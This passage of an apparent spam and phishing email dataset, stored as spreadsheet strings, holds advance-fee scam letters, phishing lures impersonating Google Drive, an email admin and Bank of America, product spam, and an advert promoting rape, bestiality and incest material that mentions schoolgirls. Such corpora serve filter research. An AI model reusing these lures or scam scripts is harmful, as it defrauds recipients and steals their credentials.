    <t>Hello          valued member! We are happy to present to you our great offer!         Brand bew collection of top rated sites!         Each include 3 sites at cost of 1! Exclusive content and regulary updates is garanteed! Animals         Sex with dogs, horses, pigs and more other..... Brutal          Rape         World of violence and cruelty. Raped schoolgirls, housewifes and other          sweet beaches. Incest         Home of parental sex. No censorship. No limits. Anime         All famous artist is worked for you. Only qualuty comics, pics and full          length movies.  Just          CLICK to offer interesting to YOU ! [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5210</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: fork@spamassassin.taint.org\nDate: Thu, 18 Jul 2002 05:10:02 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 05:10:02 -0500</t>
  </si>
  <si>
    <t>Lowest Mortgage Rates Around</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_943_7386722343340587207363271782623 Content-Type: text/plain; 	charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable We will help you get the mortgage loan you want!  Only takes 2 minutes to fill out our form.  [URL]http://202.105.49.100[/URL] Whether a new home loan is what you seek or to refinance your current home = loan at a lower interest rate and payment, we can help! Mortgage rates haven't been this low in the last 12 months, take action now! Refinance your home with us and include all of those pesky credit card bills = or use the extra cash for that pool you've always wanted...  Where others says NO, we say YES!!! Even if you have been turned down elsewhere, we can help!  Easy terms! Our mortgage referral service combines the highest quality loans with most economical rates and the easiest = qualification! Click Here to fill out our form.  [URL]http://202.105.49.100[/URL]   ------=_NextPart_943_7386722343340587207363271782623 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Mortgage companies make you wait Mortgage companies make you wait...They Demand to Interview you..= They Intimidate you...They Humiliate you...And All of That is = While They Decide If They Even Want to Do Business With You...= We Turn the Tables = on Them...Now, You're In Charge Just Fill Out Our Simple = Form and They Will Have to Compete For Your Business...CLICK = HERE FOR THE FORM We have hundreds of loan programs, including: Purchase Loans               Refinance               Debt Consolidation               Home Improvement               Second Mortgages               No Income Verification              You can save Thousands = Of Dollars over the course of your loan with just a 1/4 of 1% Drop = in your rate! CLICK HERE FOR = THE FORM You = will often be contacted with an offer thevery same day you fill out the = form! This email was sent to you using Saf-E Mail Systems.  Your email address was automatically inserted into the To and From addresses to eliminate undeliverables which waste bandwidth and cause internet congestion. Your email or webserver IS NOT being used for the sending of this mail. No-one else is receiving emails from your address. You may utilize the removal link below if you do not wish to receive this mailing.    Please Remove Me   Saf-E = Mail Systems, PO Box 116-3015 San Rafael de Heredia, CR  = 011-506-267-7139 ------=_NextPart_943_7386722343340587207363271782623-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://202.105.49.100 http://202.105.49.100 http://xent.com</t>
  </si>
  <si>
    <t>5208</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: empirestrikesback@tytcorp.com\nDate: Thu, 18 Jul 2002 03:10:31 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 03:10:31 -0500</t>
  </si>
  <si>
    <t>empirestrikesback@tytcorp.com</t>
  </si>
  <si>
    <t>FREE ORIGINAL STAR WARS CARDS Adv:</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_400_3100263864853684046 Content-Type: text/plain; 	charset="us-ascii" Content-Transfer-Encoding: 7BIT OWN A UNIQUE, ONE-OF-A-KIND PIECE OF STAR-WARS HISTORY! Exclusively Licensed FromLucas Film Ltd. 				This Innovative New Collectible is the First to Display an Authentic One of Kind 70mm Film Frame From 				 the Star Wars/Empire Strikes Back Movie 				 containing a One of a Kind 70mm Frame in a 7-1/2" x 2-3/4" Diamond Cut, Acrylic, 				 Mint Collector's Case. 				  FACT: NO TWO FRAMES ARE ALIKE Each Film Frame Is A Unique Original and Will Never Be Reproduced. 				Each fully licensed original film frame is sealed and individually serial numbered with identification codes 				tamper proof holographic seals to prevent fraudulent duplication. 			 #50049 LIGHTSABER DUEL Special Edition: 				Features the fantastic lightsaber duel between Luke Skywalker and Darth Vader. 			 				This Special Edition #50049 LIGHTSABER DUEL was only available with the Willitts premium package #50707,  				which sold in retail shops for $125.00. 			 Special, Internet offer! 				Order now and receive the above Rare Special Edition #50049 LIGHTSABER DUEL for this Special Internet price of only $19.95! Special Bonus with your order, you will receive 				  10 Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards  				  Absultely Free! 				These are Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards 				from 22 years ago! Not reprints! 				 HURRY! Please, respond now before our limited supplies are exhausted!! 				Your film cell image may differ from the above sample. 				 Click here! 				You have received this email as an opted-in subscriber, if this is not the case, please click on the following link 				 to be permanently removed from our database. 				Please take me off this list 866-667-5399NOUCE 16822 22nd Avenue NorthSaint Petersburg, FL 33710-3918 ------=_NextPart_400_3100263864853684046 Content-Type: text/html; 	charset=us-ascii Content-Transfer-Encoding: 7BIT OWN A UNIQUE, ONE-OF-A-KIND PIECE OF STAR-WARS HISTORY! Exclusively Licensed FromLucas Film Ltd. 				This Innovative New Collectible is the First to Display an Authentic One of Kind 70mm Film Frame From 				 the Star Wars/Empire Strikes Back Movie 				 containing a One of a Kind 70mm Frame in a 7-1/2" x 2-3/4" Diamond Cut, Acrylic, 				 Mint Collector's Case. 				  FACT: NO TWO FRAMES ARE ALIKE Each Film Frame Is A Unique Original and Will Never Be Reproduced. 				Each fully licensed original film frame is sealed and individually serial numbered with identification codes 				tamper proof holographic seals to prevent fraudulent duplication. 			 #50049 LIGHTSABER DUEL Special Edition: 				Features the fantastic lightsaber duel between Luke Skywalker and Darth Vader. 			 				This Special Edition #50049 LIGHTSABER DUEL was only available with the Willitts premium package #50707,  				which sold in retail shops for $125.00. 			 Special, Internet offer! 				Order now and receive the above Rare Special Edition #50049 LIGHTSABER DUEL for this Special Internet price of only $19.95! Special Bonus with your order, you will receive 				  10 Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards  				  Absultely Free! 				These are Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards 				from 22 years ago! Not reprints! 				 HURRY! Please, respond now before our limited supplies are exhausted!! 				Your film cell image may differ from the above sample. 				 Click here! 				You have received this email as an opted-in subscriber, if this is not the case, please click on the following link 				 to be permanently removed from our database. 				Please take me off this list 866-667-5399NOUCE 16822 22nd Avenue NorthSaint Petersburg, FL 33710-3918 ------=_NextPart_400_3100263864853684046-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>4125</t>
  </si>
  <si>
    <t>To: manny@ccsun37.cc.ntu.edu.tw\nFrom: &lt;meg34807147238s03@isppan.waw.pl&gt;\nDate: Thu, 18 Jul 0102 19:51:35 -0100</t>
  </si>
  <si>
    <t>Thu, 18 Jul 0102 19:51:35 -0100</t>
  </si>
  <si>
    <t>&lt;meg34807147238s03@isppan.waw.pl&gt;</t>
  </si>
  <si>
    <t>manny@ccsun37.cc.ntu.edu.tw</t>
  </si>
  <si>
    <t>Order your Viagra and weight-loss here 6117kFvc5--9</t>
  </si>
  <si>
    <t>\n\nVIAGRA  \nWITHOUT  \nA DOCTORS VISIT!!\n\nCLICK  \nHERE\n\n*Other Top Medications also available!!\n\n*We have Doctors on call around the country to view  \nyour information and quickly approve your order.\n\n*Totally Discreet System allows you to order today and  \nenjoy your medication tomorrow in most cases.\n\n*Finally you can try the wonder drug Viagra that  \nhas swept the World without the embarrassment of  \nhaving to visit your Doctor and explain your condition!!\n\nTO ORDER CLICK HERE!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nTO GET DELETED\n\n[URL]http://194.44.46.21[/URL]\n\n\n\n\n\n3606uLdz7-798Gxne6717WLiQ1-104VoKJ8349uvAE9-31l43\n\n</t>
  </si>
  <si>
    <t>http://194.44.46.21</t>
  </si>
  <si>
    <t>128</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: Emails Update &lt;k.strzyz@pronatura.bydgoszcz.pl&gt;\nDate: Thu, 18 Feb 2016 23:37:22 +0100 (CET)</t>
  </si>
  <si>
    <t>Thu, 18 Feb 2016 23:37:22 +0100 (CET)</t>
  </si>
  <si>
    <t>Emails Update &lt;k.strzyz@pronatura.bydgoszcz.pl&gt;</t>
  </si>
  <si>
    <t>ALL MAILS SECURITY UPDATE</t>
  </si>
  <si>
    <t>Hello Sir / madam, The link below contains locked files sent from a google and all mail drives you are not allowed access to the drive, you may wish to sign in and validate your email account. The message would be redirected to your email shortly.This helps us stop automated programs from accessing private sent mail. Please click the link below[URL]www.frankensolar.cz[/URL] Thanks for your help and patience!The all mails drive security Team. This email and any attachments or link are confidential and may also be privileged. If you are not the intended recipient, please delete all copies and notify the sender immediately. You may wish to refer to the incorporation details of googledrive. Hello Sir / madam,The link below contains locked files sent from a google and all mail drives you are not allowed access to the drive, you may wish to sign in and validate your email account. The message would be redirected to your email shortly.This helps us stop automated programs from accessing private sent mail.Please click the link below[URL]www.frankensolar.cz[/URL] for your help and patience!The all mails drive security Team.This email and any attachments or link are confidential and may also be privileged. If you are not the intended recipient, please delete all copies and notify the sender immediately. You may wish to refer to the incorporation details of googledrive.</t>
  </si>
  <si>
    <t>www.frankensolar.cz www.frankensolar.cz</t>
  </si>
  <si>
    <t>CZE</t>
  </si>
  <si>
    <t>4733</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "VBI" &lt;vbi@insurancemail.net&gt;\nDate: Thu, 18 Apr 2002 20:23:12 -0400</t>
  </si>
  <si>
    <t>Thu, 18 Apr 2002 20:23:12 -0400</t>
  </si>
  <si>
    <t>"VBI" &lt;vbi@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  Life Insurance Settlements: A unique dual-income opportunity  =09 A Life Settlement is the sale of a life insurance policy=20 that gives the policy owner a significant cash settlement. =09  =09  Earn substantial referral fees=0A= Sell more product=0A= Renewal Commissions of Original Policy Stay Intact=0A= A Value-Add to Your Existing Business=09 DON'T CHANGE YOUR CURRENT WAY OF DOING BUSINESS Turn your existing book into an additional income stream=20 with very little effort. =09  =09 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 Call or e-mail   us today!  800-871-9440 or visit us online at: [URL]www.Life-Settlements-Online.com[/URL] =20  =20 We don't want anybody to receive our mailings who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 =20 ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable A Unique Dual Income Opportunity =20     =20       =20        =20            =20                        A Life Settlement is = the sale of a life insurance policy              that gives the policy owner a significant cash = settlement. =20            =20            =20            DON'T CHANGE YOUR CURRENT WAY OF = DOING BUSINESS             Turn your existing book into an additional income = stream              with very little effort. =20            =20           =20              =20                  =20                      =20                         Please fill out the form below for more = information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                                          Call or e-mail us = today!             or visit us online at: www.Life-Settlements-Onli= ne.com                =20     =20        We = don't want anybody=20         to receive our mailings who does not wish to receive them. This = is professional=20         communication sent to insurance professionals. To be removed = from this=20         mailing list, DO NOT REPLY to this message. Instead, go = here: =20         [URL]http://www.Insurancemail.net[/URL] Legal=20   Notice =20 ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0--</t>
  </si>
  <si>
    <t>399</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Apple"&lt;hosting@connect.ge&gt;\nDate: Thu, 17 Nov 2016 18:51:19 -0000</t>
  </si>
  <si>
    <t>Thu, 17 Nov 2016 18:51:19 -0000</t>
  </si>
  <si>
    <t>"Apple"&lt;hosting@connect.ge&gt;</t>
  </si>
  <si>
    <t>Your Apple ID was used to sign in to iMessage on an iPhone 6.</t>
  </si>
  <si>
    <t>Your Apple ID was used to sign in to  										iCloud on an iPhone 6 named "Zikxo''. 										  										  											  										  										  										If the information above looks familiar,  										you can disregard this email. 										  										  										If you have not recently signed in to an  										iPad with your Apple ID and believe  										someone may have accessed your account,  										go to My Apple ID ( [URL]https://appleid.apple.com[/URL] )  										and review your details as soon as  										possible. 										  										  										Apple Support. 										  							  							My Apple ID | Support |   							Copyright  2016&lt;span class="yiv4155403237e 						&lt;/tr&gt;</t>
  </si>
  <si>
    <t>https://appleid.apple.com</t>
  </si>
  <si>
    <t>401</t>
  </si>
  <si>
    <t>To: Recipients &lt;info@admin.org&gt;\nFrom: "Admin" &lt;info@admin.org&gt;\nDate: Thu, 17 Nov 2016 16:09:38 -0800</t>
  </si>
  <si>
    <t>Thu, 17 Nov 2016 16:09:38 -0800</t>
  </si>
  <si>
    <t>"Admin" &lt;info@admin.org&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;info@admin.org&gt;</t>
  </si>
  <si>
    <t>Email Quota</t>
  </si>
  <si>
    <t>All email users are to click on this link:[URL]http://inverbrujasltda.cl[/URL] to upgrade their mail quota within 24hrs\n\n</t>
  </si>
  <si>
    <t>http://inverbrujasltda.cl</t>
  </si>
  <si>
    <t>1584</t>
  </si>
  <si>
    <t>To: nan\nFrom: Barr.Anthony Efe &lt;barristeranthonyefe@hotmail.com&gt;\nDate: Thu, 17 Nov 2005 21:51:55 +0000</t>
  </si>
  <si>
    <t>Thu, 17 Nov 2005 21:51:55 +0000</t>
  </si>
  <si>
    <t>Barr.Anthony Efe &lt;barristeranthonyefe@hotmail.com&gt;</t>
  </si>
  <si>
    <t>KINDNES NEEDED.</t>
  </si>
  <si>
    <t>FROM: Barrister Anthony Efe.\nTEL: 234-803-581-4937.\n\n     I am Barrister Anthony Efe, an International Legal Practitioner and a \nConsultant to Mrs. Stella Olusegun Obasanjo, (WIFE)  to the president of \nFederal Republic of Nigeria. Unfortunately, my client Mrs. Stella Olusegun \nObasanjo died on Saturday October 22nd, 2005. For details of her death \nvisit:\n[URL]http://www.cnn.com[/URL]\n          Before the untimely death of my client, she had through a security \ncompany here in Nigeria moved the sum of US$20.5m to Europe and was to \nproceed to Netherlands from Spain where she went just for medial check-up  \nimmediately after the check-up to complete arrangements and have this money \nDeposited into ABN AMRO BANK and already the security company where the \nfunds was deposited has sent notice to me requesting that this funds should \nbe claimed by the depositor (My Client) or her next of kin within 14 working \ndays, thinking that they are to take the funds just the way some   \nsecurities companies did to one of our late presidents wife and her family \n(Mrs. Maryam Abacha)  else the fund will be forfeited to the state, with \nsuch the husband wouldn�t like or wish to hear this from the press or any \none. I must confess to you that if I do not find a way to bring this fund \nout of the Finance Company, I will be doing the greatest injustice to my \nlate client and her family. This is why I decided for you to stand in as a \nnext of kin or her business partner who was supposed to receive the funds \nfor investment in Europe. There are no risks involved as I am the only \nperson who has access to my client's documents. The Finance firm has just \nsent a reminder to my client through me, informing her of the maturity of \nher fund. Your compensation for your assistance in securing the fund is \nsubject to negotiations. I need the following information from you. Your \nfull names,address,telephone and Fax numbers. Also Copy of your \nIdentification. Reply urgently, as we must conclude this transaction within \nthe next 14 working days Sincerely,\nBarrister Anthony Efe.\n\n\n\n\n</t>
  </si>
  <si>
    <t>1197</t>
  </si>
  <si>
    <t>To: nan\nFrom: barristeromoegodarris &lt;barristeromoegodarris@hotmail.com&gt;\nDate: Thu, 17 Mar 2005 13:01:43 +0200</t>
  </si>
  <si>
    <t>Thu, 17 Mar 2005 13:01:43 +0200</t>
  </si>
  <si>
    <t>barristeromoegodarris &lt;barristeromoegodarris@hotmail.com&gt;</t>
  </si>
  <si>
    <t>KINDLY ASSIST.</t>
  </si>
  <si>
    <t>\nFROM: Barrister Omoego Darris.\nTEL: 234-803-581-4937.\n\n     I am Barrister Omoego Darris, an International Legal Practitioner and a Consultant to Mr. Shouwkat Kahlil, a Lebanese Importer of Textiles and Automobiles, based in Cotonou,Republic of Benin for the past twenty years. Unfortunately, my client Mr Shouwkat Kahlil was one of the passengers that died in the ill-fated plane crash involving a Boeing 727 UTA chartered flight that took off from Cotonou, Republic of Benin and crashed into the Atlantic ocean on Thursday, 25 December 2003. For details of the plane crash,please visit :\n[URL]http://www.cnn.com[/URL]\nBefore the untimely death of my client, he had through a security company here in Cotonuo moved the sum of US$20.5m to Europe and was to\nproceed to Netherlands immediately after the Holiday to complete arrangements and have this money Deposited into ABN AMRO BANK and already the security company where the funds was deposited has sent notice to me requesting that this funds should be claimed by the depositor (My Client) or his next of kin within 14 working days, else the fund will be forfeited to the state. I must confess to you that if I do not find a way to bring this fund out of the Finance Company, I will be doing the greatest injustice to my late friend and his family. this is why I decided to you to stand in as a next of kin or his business partner who was supposed to receive the funds for investment in Europe. There are no risks involved as I am the only person who has access to my client's documents. The Finance firm has just sent a reminder to my client through me, informing him of the maturity of his fund. Your compensation for your assistance in securing the fund is subject to negotiations. I need the following information from you. Your full names,address,telephone and Fax numbers. Also Copy of your Identification. Reply urgently, as we must conclude this transaction within the next 14 working days Sincerely,\nBarrister Omoego Darris.\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://yoursite.com</t>
  </si>
  <si>
    <t>263</t>
  </si>
  <si>
    <t>To: princeige@mail3000.com\nFrom: princeige@mail3000.com\nDate: Thu, 17 Jul 2003 19:55:37 -0700</t>
  </si>
  <si>
    <t>Thu, 17 Jul 2003 19:55:37 -0700</t>
  </si>
  <si>
    <t>princeige@mail3000.com</t>
  </si>
  <si>
    <t>\nDEAR CEO\nLet me first apologise to you as regards to little embarrassment this my\nletterof proposal might cause you. In accordance to this, I received your\ncontact e-mail through Internet display when I was in need for honest and\ntransparentforeign partner, who can provide me an assistance to transfer this\nsum of forty million United States dollars to From:\nprince ige his account for joint onwardestablishment in his country through his\nwholesome assistance. Since I have decided to live and run my establishment in\nyour country.\nI am prince yusuf ige, the only Son of the late former attorney general and\nminister of Justice of the Federation Chief. Bola Ige who was shot to death as\na result of ethnic crisis here in Nigeria which the matter still under\ninvestigation. After the death of my late father, Chief Bola Ige his burial was\nperformed and was given a nice befitting burial ceremony that made some\nimportant leaders/attorney generals in other African countries to came to our\nfamily and past condolence visiting as avaledictories possession thank God the\npredecessors went back to their various countries safely.\nIt may interest you to know how the above fund was recovered, in my late father\nsecurity under-ground vault where he saved some vital documents in my favour\nand deposited the fund in Overseas Security Company for safekeeping. Since the\ndeposited fund in overseas was willed in my favour I therefore humbly request\nfor your kind wholesome assistance to assist me accommodate the above mentioned\nfund to your country account for onward joint establishment. You may however,\nnotice that the US 40million dollars was recovered during when my late father\nwas minister of power /Steel and minister of Justice for the federation based\non some contracts he signed in favour of foreign companies that executed\ncontracts here in Nigeria that worth millions of US dollars and returns were\ngiven to him as benefits before the wicked fellow shot my late father to death.\nGod is going to reward them according to their evil acts. In addition to this,\nI shall be oblige to detail you more information as regards to your kind and\nquick response on dispatch of the mail by sending to me your letter of\nacceptance and your personal phone and fax number for us to expedite action and\ndiscuss how to meet at the security company in Overseas and move the above\nmentioned fund to your vital account and plan for onward joint establishment in\nyour country. I hereby assured you also that this business stand 100% risk free\nhence the above said fund was willed to me from my late father Chief Bola Ige.\nThank you as I hope receiving your quick response for us to expedite action.\nBest regard\nPRINCE YUSUF IGE\n\n\n\n-_-_-_ Free Email Service! No Hidden Charges! Click Below to Sign Up -_-_-\n         This mail sent through [URL]http://mail3000.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://mail3000.com</t>
  </si>
  <si>
    <t>262</t>
  </si>
  <si>
    <t>To: Rrrrr &lt;R@E&gt;\nFrom: E-Loan Consumer Department &lt;consumer.support@e-loan.com&gt;\nDate: Thu, 17 Jul 2003 10:05:33 +0000</t>
  </si>
  <si>
    <t>Thu, 17 Jul 2003 10:05:33 +0000</t>
  </si>
  <si>
    <t>E-Loan Consumer Department &lt;consumer.support@e-loan.com&gt;</t>
  </si>
  <si>
    <t>Re: Your E-Loan Refinance Application Declined</t>
  </si>
  <si>
    <t>WARNING: This e-mail has been altered by MIMEDefang.  Following this paragraph are indications of the actual changes made.  For more information about your site's MIMEDefang policy, contact Departmental Computing Organization .  For more information about MIMEDefang, see:             [URL]http://www.roaringpenguin.com[/URL] An attachment named E-Loan-Appraiser-Results.pif was removed from this document as it constituted a security hazard.  If you require this document, please contact the sender and arrange an alternate means of receiving it.</t>
  </si>
  <si>
    <t>1140</t>
  </si>
  <si>
    <t>To: nan\nFrom: GENERAL VICTOR MALU &lt;genvm4@jenbach.net&gt;\nDate: Thu, 17 Feb 2005 10:45:21 +0100</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2005 10:45:21 +0100</t>
  </si>
  <si>
    <t>GENERAL VICTOR MALU &lt;genvm4@jenbach.net&gt;</t>
  </si>
  <si>
    <t>NAPIMS</t>
  </si>
  <si>
    <t>FROM THE DESK OF : GENERAL VICTOR MALU\nNATIONAL PETROLEUM INVESTMENTS \nMANAGEMENT SERVICES (NAPIMS),\nFEDERAL SECRETARIATE COMPLEX,\nMAITAMA SULE, ABUJA F.C.T.\nemail: genv_malu@123mail.cl\n\nATTENTION : DEAR FRIEND,\n\nThe Petroleum Investment Management Services (NAPIMS) in the \nExploration &amp; Production (E&amp;P) Directorate is the Upstream arm of NNPC that \noversees the Federation investments in the Joint Venture Companies \n(JVCs),Production Sharing Companies (PSCs) and Services Contract Companies  (SCC).\n\nNAPIMS is, therefore, set up to earn margin arising from investments in \nthe JVCs, PSCs and SCs with the multinationals and also protect the \nnation's strategic interests in the JVCs.In addition, NAPIMS engages in \nfrontier exploration services in basins where the multinationals hesitate \nto\nventure, like the Chad Basin.\n\nVision: To be a world class oil investment management outfit.\n\nMission Statement: To optimize the benefits accruing to the Federation \nfrom its investments in the Upstream Sector of the Petroleum (Oil &amp; \nGas) Industry.\n\nMajor Strategic Roles of NAPIMS:\n\nTo maximize Petroleum Profit Tax (PPT) and guarantee a higher Margin \n(Rate of Return) on Investment, through efficient cost monitoring \nreduction mechanisms.To ensure that a reserve base is maintained and reserve \naddition targets are attained. These are:30 billion barrels by year 2002 \nand 40 billion barrels by year 2010.\nTo ensure increased production capacity from the current 2.5 2n barrels \nof oil per day (bopd) to 3 million (bopd)by year 2003 and 4 million \nbopd by year 2010 .\nTo encourage gas utilization and commercialization\nTo promote local content input in engineering and construction, \nsupplies and materials utilization through in country technological \ncapability.\nTo enhance Nigerianization in the industry and facilitate technology \ntransfer.\nTo promote maximum co operation in communities of oil and gas producing \nareas as well as ensure that environmental protection do as are \nstrictly maintained.\n\nAs an executive director of the above named agency I am involved in the \naward of major contracts to foreign contractors.\nOne of the numerous contracts we awarded was to refurbish our moribund \nfour national refineries. However, they are still not working to 100% \ncapacity utilization. This has resulted in serious crisis in the oil \nindustry and necessitated in the price increases of petroleum products.\n\nThere has been mounting pressure on the Nigerian government to probe \nthe NNPC and its subsidiaries. As a matter of fact the National assembly \nhas already started this probe exercise. To avoid the imminent shakeup, \nwhich has already taken its toll on the former Group Managing Director \nof\nNigeria National Petroleum Resources(Dr. Jackson Gaius-Obaseki), has \nbeen dismissed from office and has been replaced by Mr. Funsho \nKupo-lokun, from the aftermath of this forgoing. I am looking for foreign \ninvestor I could front as partner. This investor will assist us invest the sum of \nUS$59.5M (FIFTY NINE MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLARS).\nPlease if interested, get back to me with my above private email so that I could discuss further details and modality of the transaction with you.\n\nI thank you.\n\nSicerely,\nGen. Victor Malu (RTD)\n\n\n\n\n\n\n_________________________________________________________________\nGesendet mit WEBMAIL - [URL]www.jenbach.net[/URL]\n</t>
  </si>
  <si>
    <t>www.jenbach.net</t>
  </si>
  <si>
    <t>53</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Bank of America"&lt;Np@niper.ac.in&gt;\nDate: Thu, 17 Dec 2015 05:45:41 +0530</t>
  </si>
  <si>
    <t>Thu, 17 Dec 2015 05:45:41 +0530</t>
  </si>
  <si>
    <t>"Bank of America"&lt;Np@niper.ac.in&gt;</t>
  </si>
  <si>
    <t>Your Account Has Been Limited</t>
  </si>
  <si>
    <t>Dear Valued Member, We noticed invalid login attempts into you account online from an unknown IP address .  Due to this, we have temporarily suspended your account. We need you to update your account information for your online banking to be re-activated please update your billing information today by clicking  here  [URL]www.bankofamerica.com[/URL] After a few clicks,  just verify the information you entered is correct.Sincerely, BOA Member Services Team P.S. The link in this message will be expire within 24 Hours . You have to update your payment information  2015 BOA LLC. All Rights Reserved.</t>
  </si>
  <si>
    <t>www.bankofamerica.com</t>
  </si>
  <si>
    <t>2425</t>
  </si>
  <si>
    <t>To: nan\nFrom: dr.jubril ibrahim &lt;dr.jubril_000000@hotmail.com&gt;\nDate: Thu, 17 Aug 2006 20:32:28 +0000</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2006 20:32:28 +0000</t>
  </si>
  <si>
    <t>dr.jubril ibrahim &lt;dr.jubril_000000@hotmail.com&gt;</t>
  </si>
  <si>
    <t>I am waiting for your urgent reply.</t>
  </si>
  <si>
    <t>FROM THE DESK OF: DR JUBRIL  IBRAHIM\nAFRICAN DEVELOPMENT BANK (ADB)\nBILL AND EXCHANGE DEPARTMENT,\nOFFSHORE OFFICE, OUAGADOUGOU,\nBURKINA-FASO.\n\n\nATTN PLS:\n\nMy Name is Dr. Jubril Ibrahim, I am the Bill and Exchange (assistant) \nManager of the Africa    development Bank here in Ouagadougou, Burkina Faso. \nIn my department i discovered an abandoned funds (USD$ 11.3million) in an \naccount that belongs to one of our foreign customer (MR.ABDUL RASAQ HASIN, \nJordan) who died along with his entire family in July 2000 in a plane crash.\n\n               [URL]http://news.bbc.co.uk[/URL]\n\nSince i got information about his death, I have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsome body applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines and laws but unfortunately we learnt \nthat all his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I now decided to make this business \nproposal to you and release the money to you as the next of kin or relation \nto the deceased for safety and subsequent disbursement since nobody is \ncoming for it and we don't want this money to go into the bank treasury as \nunclaimed bill.\n\nThe banking law and guidelines here stipulates that if such money remained \nunclaimed after Six years, the money will be transferred into the bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and an \nIndigene cannot stand as next of kin to a foreigner.\n\nYour percentage will be declared to you as soon as you indicate your \ninterest. I will visit your country for disbursement according to the \npercentage indicated once you have agreed to get this fund transferred \nthrough your account.\n\nTherefore, to enable the immediate move of this fund to you arranged, you \nmust apply first to the bank as relation or next of kin of the deceased \nindicating.\n\n1. Your full name and address\n2. Your telephone and fax number for easy communication.\n3. Your company's name and address.\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application.\n\nI will not fail to bring to your notice that this transaction is hitch-free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the movement of the money.\n\nYou should contact me immediately as soon as you receive this letter. \nTrusting to hear from you immediately. Reply through my alternative Email: \ndr.jubril_ibrahim@yahoo.co.uk\n\nYours Faithfully,\n\nDr.Jubril Ibrahim.\nAdb staff.\n\nFROM THE DESK OF: DR JUBRIL  IBRAHIM\nAFRICAN DEVELOPMENT BANK (ADB)\nBILL AND EXCHANGE DEPARTMENT,\nOFFSHORE OFFICE, OUAGADOUGOU,\nBURKINA-FASO.\n\n\nATTN PLS:\n\nMy Name is Dr. Jubril Ibrahim, I am the Bill and Exchange (assistant) \nManager of the Africa    development Bank here in Ouagadougou, Burkina Faso. \nIn my department i discovered an abandoned funds (USD$ 11.3million) in an \naccount that belongs to one of our foreign customer (MR.ABDUL RASAQ HASIN, \nJordan) who died along with his entire family in July 2000 in a plane crash.\n\n               [URL]http://news.bbc.co.uk[/URL]\n\nSince i got information about his death, I have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsome body applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines and laws but unfortunately we learnt \nthat all his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I now decided to make this business \nproposal to you and release the money to you as the next of kin or relation \nto the deceased for safety and subsequent disbursement since nobody is \ncoming for it and we don't want this money to go into the bank treasury as \nunclaimed bill.\n\nThe banking law and guidelines here stipulates that if such money remained \nunclaimed after Six years, the money will be transferred into the bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and an \nIndigene cannot stand as next of kin to a foreigner.\n\nYour percentage will be declared to you as soon as you indicate your \ninterest. I will visit your country for disbursement according to the \npercentage indicated once you have agreed to get this fund transferred \nthrough your account.\n\nTherefore, to enable the immediate move of this fund to you arranged, you \nmust apply first to the bank as relation or next of kin of the deceased \nindicating.\n\n1. Your full name and address\n2. Your telephone and fax number for easy communication.\n3. Your company's name and address.\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application.\n\nI will not fail to bring to your notice that this transaction is hitch-free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the movement of the money.\n\nYou should contact me immediately as soon as you receive this letter. \nTrusting to hear from you immediately. Reply through my alternative Email: \ndr.jubril_ibrahim@yahoo.co.uk\n\nYours Faithfully,\n\nDr.Jubril Ibrahim.\nAdb staff.\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
